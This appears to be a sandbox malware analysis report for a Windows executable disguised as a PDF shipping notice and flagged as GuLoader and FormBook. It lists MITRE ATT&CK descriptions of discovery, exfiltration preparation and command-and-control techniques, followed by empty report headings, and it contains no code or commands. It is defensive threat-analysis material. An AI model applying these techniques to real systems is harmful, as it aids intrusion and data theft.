Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Arrival Notice, CIA Awb Inv Form.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Threatname: FormBook

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets